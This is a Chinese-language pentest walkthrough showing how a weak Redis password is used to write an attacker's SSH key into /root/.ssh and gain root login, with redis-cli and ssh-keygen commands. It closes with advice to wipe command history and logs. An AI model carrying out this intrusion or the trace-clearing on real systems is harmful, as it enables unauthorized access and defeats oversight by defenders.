一，簡介
該滲透是公司內網環境，由於未能獲得網站絕對路徑，只能使用金鑰登入的方法（能有此次戰果，再次說明資訊收集十分重要！）
由於涉及到資料庫，建議先本地搭建測試，方可用於實戰！

二，參考文章
https://blog.csdn.net/qq_40989258/article/details/103261544

三，滲透開始
1，準備好redis-cli連線目標IP
-h：指定對方IP
-p：指定埠（預設：6379）
-a：指定登入密碼

2，執行沒有許可權

3，弱口令試一試，成功

4，在Linux攻擊機生成金鑰
ssh-keygen –t rsa
黃色箭頭一路回車

5，檢視生成結果（路徑是隱藏目錄：/root/.ssh）

6，將金鑰輸出到txt
（echo –e “\n\n”;cat id_rsa.pub;echo –e “\n\n”）>一個不容易起疑的好名字.txt
\n\n：是考慮到如果對方資料庫資料量大，避免和其他資料沾粘

7，檢視結果

8，利用管道符號將金鑰檔案寫入redis
cat sec.txt | redis-cli –h 10.11.20.10 –a 123456 –x set sec

9，成功

10，連線目標機器redis
檢視目標的工作目錄和資料檔名（記住黃色框的內容，一會復原用）

11，設定dir和dbfilename

12，在目標機Linux中使用金鑰登入
注意路徑在/root/.ssh下
黃色框輸入：yes

13，成功連線

14，簡單的痕跡清理

把你操作過的命令歷史刪除

清空記憶體中的history歷史記錄，命令列輸入history –c

至於其他日誌，自行清除，反正授權無所謂了！

15，恢復redis的目錄和資料檔案設定

檢視